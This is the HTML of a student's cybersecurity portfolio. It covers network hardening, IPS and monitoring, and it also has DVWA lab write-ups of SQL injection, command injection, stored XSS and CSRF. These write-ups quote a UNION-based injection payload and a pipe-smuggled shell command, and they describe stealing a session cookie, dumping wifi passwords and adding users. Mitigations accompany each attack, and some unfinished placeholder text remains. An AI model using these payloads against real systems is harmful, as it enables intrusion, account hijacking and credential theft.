          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
